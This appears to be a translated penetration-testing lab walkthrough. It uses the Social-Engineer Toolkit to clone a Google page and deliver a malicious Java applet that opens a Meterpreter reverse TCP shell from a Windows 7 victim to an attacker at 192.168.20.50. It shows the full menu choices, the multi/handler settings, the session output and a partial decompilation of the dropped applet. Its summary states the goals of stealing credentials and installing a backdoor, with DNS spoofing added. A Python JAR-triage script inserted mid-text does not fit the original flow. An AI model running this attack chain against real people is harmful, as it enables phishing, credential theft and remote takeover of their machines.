

metasploit 16. Java Applet Attack

Running the SE Toolkit (building a fake Google web site) - Java Applet Attack (distributing a malicious program)

(KaliLinux)

# setoolkit 

Select from the menu:

 

1) Social-Engineering Attacks

2) Fast-Track Penetration Testing

3) Third Party Modules

4) Update the Metasploit Framework

5) Update the Social-Engineer Toolkit

5) Update SET configuration

6) Help, Credits, and About

 

99) Exit the Social-Engineer Toolkit

 

set> 1


Select from the menu:

 

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Infectious Media Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduino-Based Attack Vector

7) SMS Spoofing Attack Vector

8) Wireless Access Point Attack Vector

9) QRCode Generator Attack Vector

10) Powershell Attack Vectors

11) Third Party Modules

 

99) Return back to the main menu.

 

set> 2


1) Java Applet Attack Method

2) Metasploit Browser Exploit Method

3) Credential Harvester Attack Method

4) Tabnabbing Attack Method

5) Web Jacking Attack Method

6) Multi-Attack Web Method

7) Full Screen Attack Method

8) HTA Attack Method

99) Return to Main Menu

 

set:webattack> 1

 

1) Web Templates

2) Site Cloner

3) Custom Import

 

99) Return to Webattack Menu

 

set:webattack>1

[-] NAT/Port Forwarding can be used in the cases where your SET machine is

[-] not externally exposed and may be a different IP address than your reverse listener.

set> Are you using NAT/Port Forwarding [yes|no]: no

[-] Enter the IP address of your interface IP or if your using an external IP, what

[-] will be used for the connection back and to house the web server (your interface address)

set:webattack> IP address or hostname for the reverse connection: 192.168.20.50



Select which option you want:

 

1. Make my own self-signed certificate applet.

2. Use the applet built into SET.         (the built-in applet is used automatically)

3. I have my own code signing certificate or applet.

 

Enter the number you want to use [1-3]: 2

[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(

 

1. Java Required

2. Google

3. Facebook

4. Twitter

5. Yahoo

 

set:webattack> Select a template:2


Name: Description:

 

1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector

2) Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory

3) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET

4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support

5) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP

6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec

7) Import your own executable Specify a path for your own executable

 

set:payloads> 1   (default Meterpreter method)

set:payloads> PORT of the listener [443]: <ENTER>     (port 443 is not blocked by intermediate devices, because clients need it to browse the web)

 

Select the payload you want to deliver via shellcode injection

 

1) Windows Meterpreter Reverse TCP

2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager

3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager

4) Windows Meterpreter (ALL PORTS) Reverse TCP

 

set:payloads> Enter the number for the payload [meterpreter_reverse_tcp]: 1


[*] Processing /root/.set/meta_config for ERB directives.

resource (/root/.set/meta_config)> use exploit/multi/handler

resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

resource (/root/.set/meta_config)> set LHOST 192.168.20.50

LHOST => 192.168.20.50

resource (/root/.set/meta_config)> set LPORT 443

LPORT => 443

resource (/root/.set/meta_config)> set EnableStageEncoding false

EnableStageEncoding => false

resource (/root/.set/meta_config)> set ExitOnSession false

ExitOnSession => false

resource (/root/.set/meta_config)> exploit -j

...

[*] Started reverse handler on 192.168.20.50:443

[*] Starting the payload handler...

msf exploit(handler) > 



(windows 7)

 

On Windows 7, connect to the web server at 192.168.20.50 through a browser.

 

(Note) If Java is not installed, install it from the site below.

- https://java.com/ko/

 

(Preparation)

Start > All Programs > Java > Configure Java > "Security" > [ V ] High

Exception Site List > Edit Site List > Add > "http://192.168.20.50"


Use the Mozilla Firefox browser.

http://192.168.20.50/

-> The Java applet is downloaded.

-> The browser is then forwarded to www.google.com.



On Kali Linux, check the connected session (Reverse TCP Session)

(KaliLinux)

 ..... (omitted) .....

 

[*] Exploit running as background job.

 

[*] Started reverse handler on 192.168.20.50:443

[*] Starting the payload handler...

msf exploit(handler) >

[*] Sending stage (957487 bytes) to 192.168.20.201

[*] Meterpreter session 1 opened (192.168.20.50:443 -> 192.168.20.201:49317) at 2016-01-09 03:40:46 +0900

<ENTER>

msf exploit(handler) > sessions -l

 

Active sessions

===============

 

Id Type Information Connection

-- ---- ----------- ----------

1 meterpreter x86/win32 WIN7\soldesk @ WIN7 192.168.20.50:443 -> 192.168.20.201:49317 (192.168.20.201)

 

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

 

meterpreter > sysinfo

Computer : SOLDESK-PC

OS : Windows 7 (Build 7601, Service Pack 1).

Architecture : x64 (Current Process is WOW64)

System Language : ko_KR

Meterpreter : x86/win32

 

meterpreter > quit

[*] Shutting down Meterpreter...

 

[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit

msf exploit(handler) > quit

[*] Everything has been moved over to Apache and is ready to go.

 

Press <return> to continue

<ENTER>

 

set:webattack>99

set> 99

set> 99



# cd /var/www/html

# ls

1vHuSK.jar DjWZVG0 index.html msf.exe

 

# file *

1vHuSK.jar: Zip archive data, at least v2.0 to extract

DjWZVG0: PE32 executable (console) Intel 80386, for MS Windows

index.html: HTML document, UTF-8 Unicode text, with very long lines

msf.exe: PE32 executable (console) Intel 80386, for MS Windows

 

[Note] jar command usage (The Java Archive Tool)

# jar cvf file.jar file1 file2 file3  c: create, v: verbose, f: file 

# jar tvf file.jar  t: list the table of contents 

# jar xvf file.jar  x: extract 

 

# jar tvf 1vHuSK.jar

237 Thu Oct 15 08:00:10 KST 2015 META-INF/MANIFEST.MF

255 Thu Oct 15 08:00:10 KST 2015 META-INF/SIGNAPPL.SF

1114 Thu Oct 15 08:00:10 KST 2015 META-INF/SIGNAPPL.DSA

0 Thu Oct 15 08:00:08 KST 2015 META-INF/

5881 Thu Oct 15 08:00:08 KST 2015 Java.class

 

# jar xvf 1vHuSK.jar

-> output omitted

 

# ls

1vHuSK.jar DjWZVG0 Java.class META-INF index.html msf.exe

 

# file *

1vHuSK.jar: Zip archive data, at least v2.0 to extract

DjWZVG0: PE32 executable (console) Intel 80386, for MS Windows

Java.class: compiled Java class data, version 50.0 (Java 1.6)

Java.jad: ASCII text

META-INF: directory

index.html: HTML document, UTF-8 Unicode text, with very long lines

msf.exe: PE32 executable (console) Intel 80386, for MS Windows

 

# cat Java.class

-> Since this is a compiled Java class file, it does not display as readable text.
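To make sense of the `jar tvf` listing and the `file` output above (signature files under META-INF/, a class file at version 50.0 = Java 1.6), here is an added Python triage script that is not part of the original post or of SET; it builds a constructed sample JAR with the same layout and reports its classes, their class-file versions and whether the archive carries a signature, which is what a responder checks before ever running such a file.

```python
import io
import struct
import zipfile

# Constructed sample: a minimal JAR laid out like the one listed with `jar tvf`
# above (signature files under META-INF/ plus a single Java.class). The class
# file holds only a valid header (magic 0xCAFEBABE, minor 0, major 50 = Java 6);
# the rest is dummy bytes, not a real applet.
FAKE_CLASS = struct.pack(">IHH", 0xCAFEBABE, 0, 50) + b"\x00" * 16

def build_sample_jar() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("META-INF/SIGNAPPL.SF", "Signature-Version: 1.0\n")
        zf.writestr("META-INF/SIGNAPPL.DSA", b"\x30\x82")  # placeholder, not a real signature block
        zf.writestr("Java.class", FAKE_CLASS)
    return buf.getvalue()

# Major class-file version -> JDK that produced it (50 is the "Java 1.6" that `file` reported)
JAVA_VERSIONS = {45: "1.1", 46: "1.2", 47: "1.3", 48: "1.4", 49: "5", 50: "6", 51: "7", 52: "8"}

def class_version(data: bytes):
    """Return (major, minor, java_version) from a class-file header, or None if not a class file."""
    if len(data) < 8:
        return None
    magic, minor, major = struct.unpack(">IHH", data[:8])
    if magic != 0xCAFEBABE:
        return None
    return major, minor, JAVA_VERSIONS.get(major, "unknown")

def triage_jar(jar_bytes: bytes) -> dict:
    """Summarise a JAR without executing it: which classes it carries, what compiler
    level produced them, and whether it is signed (SET's applet relied on a self-signed
    signature, which newer Java releases refuse by default)."""
    report = {"classes": {}, "signature_files": [], "signed": False}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            upper = name.upper()
            if upper.startswith("META-INF/") and upper.endswith((".SF", ".DSA", ".RSA", ".EC")):
                report["signature_files"].append(name)
            elif name.endswith(".class"):
                report["classes"][name] = class_version(zf.read(name))
    report["signed"] = any(f.upper().endswith(".SF") for f in report["signature_files"])
    return report

if __name__ == "__main__":
    print(triage_jar(build_sample_jar()))
```

Point `triage_jar` at the bytes of a real JAR pulled from a web root or a proxy capture to get the same summary without opening the archive in a JVM.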


[Note] Terminology: compile/decompile  

ls.c(ASCII) ----compile--->ls(binary)   converted into a form the operating system kernel can load directly

ls(binary) ----decompile--->ls.c(ASCII) 

Decompiling an ~.exe file built in a high-level language other than C lets you see the original source code. 

 

# jad Java.class  (jad: Java Decompiler) 

Parsing Java.class...The class file version is 50.0 (only 45.3, 46.0 and 47.0 are supported)

Generating Java.jad

Overlapped try statements detected. Not all exception handlers will be resolved in the method init

Couldn't fully decompile method init

Couldn't resolve all exception handlers in method init

Couldn't fully decompile method m

Couldn't fully decompile method <init>

 

# cat Java.jad   (the decompiled source file for Java.class, which was written in Java)

// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.

// Jad home page: http://www.geocities.com/kpdus/jad.html

// Decompiler options: packimports(3)

// Source File Name: v

 

import java.applet.Applet;

import java.applet.AppletContext;

import java.io.*;

import java.net.URL;

import java.net.URLConnection;

import java.util.Random;

import sun.misc.BASE64Decoder;

 

public class Java extends Applet

{

 

public void init()

{

Random random;

Object obj1;

String s;

String s1;

Object obj2;

Object obj3;

..... (omitted) .....

 

 

[Note] File backup

# cd /var/www/html

# tar cvzf /backup/FakeWEB2.tar.gz .

 

(Summary)

(Lab 1) Build a fake site (e.g. Google site)

-> (Purpose) collect IDs/passwords

(Lab 2) Build a fake site (e.g. Google site)

-> (Purpose) install a malicious program (backdoor)

 

(Client) Windows 7

http://192.168.20.50

Used together with DNS spoofing, the address can be given in domain form rather than IP form, so the attack can be carried out with a domain name.